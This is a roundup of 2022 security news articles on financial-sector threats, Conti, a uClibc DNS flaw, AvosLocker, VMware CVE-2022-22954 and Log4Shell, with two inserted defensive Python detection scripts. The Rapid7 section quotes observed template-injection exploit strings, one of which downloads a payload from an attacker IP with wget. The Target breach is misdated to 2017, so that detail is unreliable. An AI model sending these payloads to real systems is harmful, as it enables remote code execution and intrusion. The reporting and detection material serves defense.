
What's Changed for Cybersecurity in Banking and Finance: New Study

 


Cybersecurity in financial services is a complex picture. Not only has a range of new tech hit the industry in the last 5 years, but compliance requirements introduce another layer of difficulty to the lives of infosec teams in this sector. To add to this picture, the overall cybersecurity landscape has rapidly transformed, with ransomware attacks picking up speed and high-profile vulnerabilities hitting the headlines at an alarming pace.

VMware recently released the 5th annual installment of their Modern Bank Heists report, and the results show a changing landscape for cybersecurity in banking and finance. Here’s a closer look at what CISOs and security leaders in finance said about the security challenges they’re facing — and what they’re doing to solve them.

Destructive threats and ransomware attacks on banks are increasing

The stakes for cybersecurity are higher than ever at financial institutions, as threat actors are increasingly using more vicious tactics. Banks have seen an uptick in destructive cyberattacks — those that delete data, damage hard drives, disrupt network connections, or otherwise leave a trail of digital wreckage in their wake.

63% of financial institutions surveyed in the VMware report said they’ve seen an increase in these destructive attacks targeting their organization — that’s 17% more than said the same in last year’s version of the report.

At the same time, finance hasn’t been spared from the rise in ransomware attacks, which have also become increasingly disruptive. Nearly 3 out of 4 respondents to the survey said they’d been hit by at least one ransomware attack. What’s more, 63% of those ended up paying the ransom.

Supply chain security: No fun in the sun

Like ransomware, island hopping is also on the rise — and while that might sound like something to do on a beach vacation, that’s likely the last thing the phrase brings to mind for security pros at today’s financial institutions.

IT Pro describes island hopping attacks as “the process of undermining a company’s cyber defenses by going after its vulnerable partner network, rather than launching a direct attack.” The source points to the high-profile data breach that rocked big-box retailer Target in 2017. Hackers found an entry point to the company’s data not through its own servers, but those of Fazio Mechanical Services, a third-party vendor.

In the years since the Target breach, supply chain cybersecurity has become an even greater area of focus for security pros across industries, thanks to incidents like the SolarWinds breach and large-scale vulnerabilities like Log4Shell that reveal just how many interdependencies are out there. Now, threats in the software supply chain are becoming more apparent by the day.

VMware’s study found that 60% of security leaders in finance have seen an increase in island hopping attacks — 58% more than said the same last year. The uptick in threats originating from partners’ systems is clearly keeping security officers up at night: 87% said they’re concerned about the security posture of the service providers they rely on.

The proliferation of mobile and web applications associated with the rise of financial technology (fintech) may be exacerbating the problem. VMware notes API attacks are one of the primary methods of island hopping — and they found a whopping 94% of financial-industry security leaders have experienced an API attack through a fintech application, while 58% said they’ve seen an increase in application security incidents overall.

How financial institutions are improving cybersecurity

With attacks growing more dangerous and more frequent, security leaders in finance are doubling down on their efforts to protect their organizations. The majority of companies surveyed in VMware’s study said they planned a 20% to 30% boost to their cybersecurity budget in 2022. But what types of solutions are they investing in with that added cash?

The number 1 security investment for CISOs this year is extended detection and response (XDR), with 24% listing this as their top priority. Closely following were workload security at 22%, mobile security at 21%, threat intelligence at 15%, and managed detection and response (MDR) at 11%. In addition, 51% said they’re investing in threat hunting to help them stay ahead of the attackers.

Today’s threat landscape has grown difficult to navigate — especially when financial institutions are competing for candidates in a tight cybersecurity talent market. In the meantime, the financial industry has only grown more competitive, and the pace of innovation is at an all-time high. Having powerful, flexible tools that can streamline and automate security processes is essential to keep up with change. For banks and finance organizations to attain the level of visibility they need to innovate while keeping their systems protected, these tools are crucial.


Conti Ransomware Attack Spurs State of Emergency in Costa Rica

 


Costa Rican President Rodrigo Chaves declared a state of national cybersecurity emergency over the weekend following a financially motivated Conti ransomware attack against his administration that has hamstrung the government and economy of the Latin American nation.

The attack, attributed to the prolific Conti ransomware group, occurred three weeks ago, not long after Chaves took office; in fact, the state of emergency was one of his first decrees as president. The first government agency attacked was the Ministry of Finance, which has been without digital services since April 18, according to a published report.

Conti, a top-tier Russian-speaking ransomware group, is known as one of the most ruthless gangs in the game, with a take-no-prisoners approach specializing in double extortion, a method in which attackers threaten to expose stolen data or use it for future attacks if victims don’t pay by a deadline.

Conti acts on a ransomware-as-a-service (RaaS) model, with a vast network of affiliates and access brokers at its disposal to do its dirty work. The group also is known for targeting organizations for which attacks could have life-threatening consequences, such as hospitals, emergency number dispatch carriers, emergency medical services and law-enforcement agencies.

The attack on Costa Rica could be a sign of more Conti activity to come, as the group posted a message on their news site to the Costa Rican government saying the attack is merely a “demo version.” The group also said the attack was motivated solely by financial gain, while also expressing general political disgust, another signal of more government-directed attacks.

Next-Level Incident

The incident demonstrates how a cyber-attack can potentially be as serious as a military action or a natural disaster, especially when it affects a developing nation like Costa Rica, a security professional observed.

“Costa Rica’s state-of-emergency following an attack from Conti is an important rallying call to the rest of the world,” Silas Cutler, principal reverse engineer for security firm Stairwell, wrote in an e-mail to Threatpost. “While the emergency status may have a limited direct impact … it puts the severity of this breach into the same category as a natural disaster or military incident.”

The double-extortion aspect of not only Conti’s but also a number of other ransomware groups’ methods also can embolden more ransomware attacks, because most targeted organizations will pay rather than risk the leak of sensitive data, providing more incentive to threat actors, noted another security professional.

“It is a large reason why most victims are paying today,” observed Roger Grimes, data-driven defense evangelist for security firm KnowBe4, in an email to Threatpost.

Conti likely has every employee’s personal login credentials to any Costa Rican government site that they visited during the time the ransomware was active on the system before it locked files, which poses a big problem for citizens using government services online if Conti indeed has leaked the info, he said.

“If Costa Rica was hosting customer-facing websites in the compromised domains, like they likely were, their customers’ credentials–which are often reused on other sites and services the customers visit–are likely compromised, too,” Grimes said. “Not paying the ransom puts not only Costa Rica’s own services at risk, but those of their employees and customers.”

Indeed, last year the city of Tulsa, OK, put its citizens on alert for potential cyber fraud after Conti leaked some 18,000 city files, mostly police citations, on the dark web following a ransomware attack on the city’s government.

U.S. Offering Aid

To help prevent future attacks like the one on Costa Rica, the U.S. government said last week that it’s offering a hefty reward, up to $10 million, for information leading to the identification and/or location of any of Conti Group’s leaders. The U.S. also will offer up to $5 million for info that can lead to the arrest or conviction of anyone conspiring in a Conti ransomware attack.

To date, Conti has been responsible for hundreds of ransomware incidents over the past two years, with more than 1,000 victims paying more than $150 million to the group, according to the FBI. This gives Conti the dubious honor of being the costliest ransomware strain ever documented, according to the feds.

While authorities pursue Conti, governments can take a number of steps to prevent ransomware attacks, security professionals noted. One is to adopt a cultural change when it comes to cybersecurity, observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel.

Governments should shift their focus from the historic mentality of cyber-security as an “IT cost center” toward one that views it as “a culturally ingrained approach that identifies cybersecurity investment, both in tools and people, as a critical strategic defensive shield,” he said in an email to Threatpost.

“Until this changes, the problem of cyber-attack is going to get worse before it gets any better,” Clements said in an email to Threatpost.

Governments also can take proactive steps such as conducting perimeter reviews as a means of mitigating some of the methods Conti-affiliated access brokers use to infiltrate systems, Cutler suggested. This can better secure their perimeters and allow them to react faster to attacks.

However, even this “will not fully prevent these types of attacks” given the network of affiliates and access brokers that RaaS groups like Conti have at their disposal to breach systems, he said.

Unpatched DNS Bug Puts Millions of Routers, IoT Devices at Risk

 


An unpatched Domain Name System (DNS) bug in a popular standard C library can allow attackers to mount DNS poisoning attacks against millions of IoT devices and routers to potentially take control of them, researchers have found.

Researchers at Nozomi Networks Labs discovered the flaw affecting the implementation of DNS in all versions of uClibc and uClibc-ng, popular C standard libraries found in numerous IoT products, they revealed in a blog post this week.

“The flaw is caused by the predictability of transaction IDs included in the DNS requests generated by the library, which may allow attackers to perform DNS poisoning attacks against the target device,” Nozomi’s Giannis Tsaraias and Andrea Palanca wrote in the post.

In a DNS poisoning attack, also known as DNS spoofing or DNS cache poisoning, an attacker deceives a DNS client into accepting a forged response. This forces a program to perform network communications with an arbitrarily defined endpoint instead of the legitimate one.

Numerous Affected Devices

The scope of the flaw is vast, as major vendors such as Linksys, Netgear and Axis, as well as Linux distributions such as Embedded Gentoo, use uClibc in their devices. Meanwhile, uClibc-ng is a fork specifically designed for OpenWRT, a common OS for routers deployed throughout various critical infrastructure sectors, researchers said. Specific devices impacted by the bug were not disclosed as part of this research.

Moreover, if an attacker mounts a successful DNS poisoning attack on an affected device, they also can perform a subsequent man-in-the-middle attack, researchers said, because by poisoning DNS records they can re-route network communications to a server under their control.

“The attacker could then steal and/or manipulate information transmitted by users, and perform other attacks against those devices to completely compromise them,” researchers wrote. “The main issue here is how DNS poisoning attacks can force an authenticated response.”

Researchers are currently working with the maintainer of the uClibc library to develop a fix for the vulnerability, which until then leaves devices exposed, they said. Because of this, Nozomi researchers have declined to disclose specific details of the device on which they were able to reproduce the flaw, to keep attackers at bay.

DNS as a Target

News of the DNS vulnerability brings reminders of last year’s Log4Shell flaw, which sent ripples of concern within the cybersecurity community when it was discovered in December because of its scope. The flaw affects the ubiquitous open-source Apache Log4j framework—found in countless Java apps used across the internet. In fact, a recent report found that the flaw continues to put millions of Java apps at risk, though a patch exists for the flaw.

Though it affects a different set of targets, the DNS flaw also has a broad scope not only because of the devices it potentially affects, but also because of the inherent importance of DNS to any device connecting over IP, researchers said.

DNS is a hierarchical database that serves the integral purpose of translating a domain name into its related IP address. To distinguish the responses to different DNS requests, beyond the usual 5-tuple (source IP, source port, destination IP, destination port, protocol) and the query itself, each DNS request includes a parameter called the “transaction ID.”

The transaction ID is a unique number per request that is generated by the client and added to each request sent. It must be included in a DNS response for the client to accept that response as the valid one for the request, researchers noted.

“Because of its relevance, DNS can be a valuable target for attackers,” they observed.

The Vulnerability and Exploitation

Researchers discovered the flaw while reviewing the trace of DNS requests performed by an IoT device, they said. They noticed something abnormal in the pattern of DNS requests from the output of Wireshark. The transaction ID of the request was at first incremental, then reset to the value 0x2, then was incremental again.

“While debugging the related executable, trying to understand the root cause, we eventually noticed that the code responsible for performing the DNS requests was not part of the instructions of the executable itself, but was part of the C standard library in use, namely uClibc 0.9.33.2,” they explained.

Researchers performed a source code review and found that the uClibc library implements DNS requests by calling the internal “__dns_lookup” function, which is located in the source file “/libc/inet/resolv.c.”

Eventually they found fault with specific lines of code in the library, namely lines #1240, #1260, #1309, #1321 and #1335, to which they could attribute the anomaly in the DNS request pattern that makes the transaction ID predictable, researchers said.

This predictability means that to exploit the flaw, an attacker would need to craft a DNS response that contains the correct source port, as well as win the race against the legitimate DNS response incoming from the DNS server, researchers said.

“It is likely that the issue can easily be exploited in a reliable way if the operating system is configured to use a fixed or predictable source port,” they explained.

Exploitability also depends on how the OS randomizes the source port: where it does, an attacker would have to brute-force the 16-bit source port value by sending multiple DNS responses, while simultaneously beating the legitimate DNS response, researchers added.
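The transaction-ID anomaly described above (a counter that climbs, resets to 0x2 and climbs again) is something a defender can check for in their own DNS traffic. The following is an added example, not code from Nozomi's write-up or from uClibc: it parses the 12-byte DNS header of constructed query packets and flags sequences whose IDs are predictable, with a randomized sequence for contrast; the function and sample names are my own.

```python
"""Flag predictable DNS transaction IDs in a sequence of captured queries.

Added example, not from the Nozomi write-up. It reads the 12-byte DNS
header (RFC 1035) of each query and checks the transaction-ID sequence for
an incrementing counter that resets to a fixed value, which a forger could
predict. The sample packets below are constructed, not captured.
"""
import struct
from typing import Iterable, List


def build_query(txid: int, name: str = "example.com") -> bytes:
    """Construct a minimal DNS A query carrying the given transaction ID (sample data)."""
    # ID, flags (RD set), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=0
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def transaction_id(packet: bytes) -> int:
    """Extract the 16-bit transaction ID from the first two bytes of a DNS message."""
    if len(packet) < 12:
        raise ValueError("truncated DNS header")
    return struct.unpack("!H", packet[:2])[0]


def predictable_txids(txids: List[int], min_run: int = 4) -> dict:
    """Report how predictable a transaction-ID sequence looks.

    Flagged when the sequence contains a run of at least `min_run` IDs that
    each increase by exactly 1, or when the counter resets to the same value
    more than once (the reset-to-0x2 pattern), since the next ID is then guessable.
    """
    longest_run = 1
    run = 1
    resets = []  # values the sequence dropped back to
    for prev, cur in zip(txids, txids[1:]):
        if cur == prev + 1:
            run += 1
            longest_run = max(longest_run, run)
        else:
            run = 1
            if cur < prev:
                resets.append(cur)
    repeated_reset = len(set(resets)) < len(resets)
    return {
        "longest_increment_run": longest_run,
        "reset_values": resets,
        "distinct_ratio": len(set(txids)) / len(txids) if txids else 0.0,
        "predictable": longest_run >= min_run or repeated_reset,
    }


def analyze_capture(packets: Iterable[bytes]) -> dict:
    """Run the predictability check over raw DNS query messages."""
    return predictable_txids([transaction_id(p) for p in packets])


# Constructed sample: IDs climb, reset to 0x2, climb again (the pattern from the write-up)
SAMPLE_VULNERABLE = [build_query(t) for t in [0x2, 0x3, 0x4, 0x5, 0x6, 0x2, 0x3, 0x4, 0x5, 0x2]]
# Constructed sample: IDs as a properly randomizing resolver would emit them
SAMPLE_RANDOM = [build_query(t) for t in [0x9F3A, 0x1C07, 0xE4B2, 0x5A81, 0x0D6E, 0xB37F]]

if __name__ == "__main__":
    print("vulnerable pattern:", analyze_capture(SAMPLE_VULNERABLE))
    print("randomized pattern:", analyze_capture(SAMPLE_RANDOM))
```

On a real capture, feed it the UDP payloads of outbound port-53 queries from one device; the predictable flag, not the exact reset value, is what matters.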

Mitigation

Because the bug remains unpatched on millions of IoT devices, researchers explained, they are not disclosing the specific devices vulnerable to attack. In the interim, Nozomi Networks recommends that network administrators increase their network visibility and security in both IT and Operational Technology environments.

“This vulnerability remains unpatched, however we are working with the maintainer of the library and the broader community in support of finding a solution,” they wrote.

AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection

 


Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws.

“This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (aswArPot.sys),” Trend Micro researchers, Christoper Ordonez and Alvin Nieto, said in a Monday analysis.

“In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap NSE script.”

AvosLocker, one of the newer ransomware families to fill the vacuum left by REvil, has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.

A ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.

Other targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an advisory released by the U.S. Federal Bureau of Investigation (FBI) in March 2022.

Telemetry data gathered by Trend Micro shows that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.

The entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho’s ManageEngine ADSelfService Plus software (CVE-2021-40539) to run an HTML application (HTA) hosted on a remote server.

“The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the [command-and-control] server to execute arbitrary commands,” the researchers explained.

This includes retrieving an ASPX web shell from the server as well as an installer for the AnyDesk remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.

Some of the components copied to the infected endpoint are an Nmap script to scan the network for the Log4Shell remote code execution flaw (CVE-2021-44228) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints.

The batch script, for its part, is equipped with a wide range of capabilities that allow it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.

Also used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company resolved in June 2021.

“The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege),” the researchers pointed out. “This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.”

Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954

 


On April 6, 2022, VMware published VMSA-2022-0011, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954, a critical remote code execution vulnerability affecting VMware’s Workspace ONE Access and Identity Manager solutions. The vulnerability arises from a server-side template injection flaw and has a CVSSv3 base score of 9.8. Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the VMware user.

Rapid7’s vulnerability research team has a full analysis of CVE-2022-22954 in AttackerKB, including chaining the vulnerability with CVE-2022-22960 to escalate to root.

Affected products:

  • VMware Workspace ONE Access (Access) 20.10.0.0 - 20.10.0.1, 21.08.0.0 - 21.08.0.1
  • VMware Identity Manager (vIDM) 3.3.3 - 3.3.6

VMware updated their advisory to note active exploitation in the wild on April 12, 2022; a day later, security news outlet Bleeping Computer indicated that several public proof-of-concept exploits were being used in the wild to drop coin miners on vulnerable systems. More recently, security firm Morphisec published analysis of attacks that exploited CVE-2022-22954 to deploy reverse HTTPS backdoors. Public proof-of-concept exploit code is available and fits in a tweet (credit to researchers wvu and Udhaya Prakash).

Rapid7’s Project Heisenberg detected scanning/exploitation activity on 2022-04-13 and again on 2022-04-22. A total of 14 requests were observed across ports 80, 98, 443, 4443.


Scanning/exploitation strings observed:

  • /catalog-portal/ui/oauth/verify
  • /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}
  • /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://106[.]246[.]224[.]219/one")}

Attacker IP addresses:

These nodes appear to be members of generic botnets. Rapid7’s Heisenberg network has observed many of them involved in the same campaigns as noted in the above graphic, as well as Log4Shell exploitation attempts.
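The scanning strings above have a fixed shape: a hit on /catalog-portal/ui/oauth/verify whose deviceUdid parameter carries a FreeMarker `${...}` expression invoking freemarker.template.utility.Execute. The following is an added example, not Rapid7's InsightIDR rule or VMware's code: it runs that check over constructed web-server access-log lines in combined format, separating bare endpoint hits from lines carrying a template payload; the log lines and IPs (RFC 5737 documentation ranges) are constructed.

```python
"""Scan web-server access logs for the CVE-2022-22954 request pattern.

Added example, not Rapid7's detection rule. It flags requests to the
Workspace ONE Access endpoint /catalog-portal/ui/oauth/verify and marks those
whose deviceUdid parameter decodes to a FreeMarker template expression that
calls freemarker.template.utility.Execute. Sample lines are constructed.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/catalog-portal/ui/oauth/verify"
# A ${...} interpolation wrapping the FreeMarker Execute utility is the SSTI marker
TEMPLATE_MARKER = re.compile(r"\$\{.*freemarker\.template\.utility\.Execute.*\}", re.IGNORECASE)
# Combined log format: client IP ... [timestamp] "METHOD URI PROTOCOL" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(uri: str) -> Optional[str]:
    """Return 'ssti_payload' for a template expression in deviceUdid,
    'endpoint_hit' for any other request to the endpoint, None otherwise."""
    parts = urlsplit(uri)
    if parts.path != TARGET_PATH:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("deviceUdid", []):
        # parse_qs decodes one layer of percent-encoding; unquote catches a double-encoded payload
        if TEMPLATE_MARKER.search(unquote(value)):
            return "ssti_payload"
    return "endpoint_hit"


def scan_log(lines: List[str]) -> List[dict]:
    """Parse each access-log line and report those touching the vulnerable endpoint."""
    findings = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue  # not in combined format; skip rather than guess
        verdict = classify_request(match.group("uri"))
        if verdict:
            findings.append({
                "ip": match.group("ip"),
                "time": match.group("time"),
                "status": int(match.group("status")),
                "verdict": verdict,
            })
    return findings


# Constructed sample lines (documentation IPs, not the observed attacker addresses).
# Line 2 carries the percent-encoded form of the "cat /etc/hosts" string quoted above.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Apr/2022:08:14:02 +0000] "GET /catalog-portal/ui/oauth/verify HTTP/1.1" 200 512 "-" "python-requests/2.27"',
    '192.0.2.10 - - [13/Apr/2022:08:14:05 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid='
    '%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/etc/hosts%22%29%7D HTTP/1.1" 400 0 "-" "python-requests/2.27"',
    '198.51.100.7 - - [13/Apr/2022:09:01:44 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [22/Apr/2022:17:30:11 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=8f2c1e HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

An endpoint_hit alone is not evidence of attack (legitimate clients use the path); a ssti_payload verdict, or a burst of hits from one source across ports as Heisenberg saw, is what merits escalation.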

Mitigation guidance

VMware customers should patch their Workspace ONE Access and Identity Manager installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions here on patching and applying workarounds. VMware has an FAQ available on this advisory here.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2022-22954 with an authenticated vulnerability check for Unix-like systems. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.)

InsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability. We recommend that you review your settings for this detection rule and confirm it is turned on and set to an appropriate rule action and priority for your organization:

  • Suspicious Process - VMware Workspace ONE Access Launches Process

For our MDR service customers, Rapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response (MDR), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary. The MDR team will notify you if suspicious activity is detected in your environment.


U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities

 


Log4Shell, ProxyShell, ProxyLogon, ZeroLogon, and flaws in Zoho ManageEngine AD SelfService Plus, Atlassian Confluence, and VMware vSphere Client emerged as some of the top exploited security vulnerabilities in 2021.

That’s according to a "Top Routinely Exploited Vulnerabilities" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.

Other frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server (CVE-2020-0688), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure (CVE-2019-11510), and a path traversal defect in Fortinet FortiOS and FortiProxy (CVE-2018-13379).

Most Exploited Software Vulnerabilities

Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.

“Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,” the agencies said in a joint advisory.

“For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability’s disclosure, likely facilitating exploitation by a broader range of malicious actors.”

To mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies recommend that organizations apply patches in a timely fashion and implement a centralized patch management system.

Millions of Java Apps Remain Vulnerable to Log4Shell

 


Four months after the discovery of the zero-day Log4Shell critical flaw, millions of Java applications still remain vulnerable to compromise, researchers have found.

Rezilion expected that due to the “massive amount of media coverage” the bug unsurprisingly received, the majority of applications would already be patched, Head of Vulnerability Research Yotam Perkal wrote in a report published Tuesday. However, their analysis found a very different story, he said.

“We learned that the landscape is far from ideal and many applications vulnerable to Log4Shell still exist in the wild,” Perkal wrote in the report.

Supporting Evidence

Researchers did a search on the Shodan search engine to see how many apps vulnerable to Log4Shell are exposed to the internet. They identified 90,000 potentially vulnerable internet-facing applications, which they believe “is just the tip of the iceberg in terms of the actual vulnerable attack surface,” Perkal wrote.

Researchers divided the apps into three categories. The first two are containers whose latest version still contains obsolete versions of Log4j, and containers whose latest version is up to date but still shows evidence of using previous versions.

The third category is publicly facing servers of the world’s favorite internet game Minecraft, which highlight the risks of outdated proprietary software, researchers noted… Indeed, it was on Minecraft sites that the vulnerability first turned up and apparently still persists.

Researchers cited other sources for further proof that the Log4Shell attack surface remains vast. One was the Google service Open Source Insights, which scans millions of open-source packages. The service found that out of a total of 17,840 packages affected by the flaw, only 7,140 were patched, making nearly 60 percent still vulnerable.

Moreover, many applications are still using Log4j version 1.x and likely aren’t patched because the original Log4Shell vulnerability, tracked as CVE-2021-44228, doesn’t apply to this version, researchers noted.

However, this is a misconception, as that version has been “in an end-of-life state since August 2015 (which means it does not get any security updates), and contains plenty of other vulnerabilities, including RCE vulnerabilities,” Perkal noted.

“This should definitely worry organizations that are still using it,” he wrote.

Under Active Exploitation

Perhaps most worrying about the vulnerable attack surface is that Log4Shell remains a hot target for threat actors, researchers noted. Indeed, attackers immediately set upon the bug once it was discovered—already under active exploitation—and haven’t let up much since.

While Apache released a patch for Log4Shell within a day of discovery, it, too, had issues that could lead to DoS attacks—and apparently still hasn’t been applied in many cases.

Initial attempts to exploit the bug in the wild were aimed at ransomware deployment and coin miners; however, as time went on, APT groups joined the fray and began pummeling the flaw in earnest, researchers said.

Most recently, active exploitation of Log4Shell has been linked to the Chinese APT 41 group and Deep Panda, Perkal said. Before that, the Chinese state-sponsored espionage group HAFNIUM and Iranian-backed groups APT35 (aka Newscaster) and Tunnel Vision also targeted the flaw.

Currently there are still dozens of recorded daily exploitation attempts of Log4Shell, according to a honeypot set up by the SANS Internet Storm Center, researchers noted.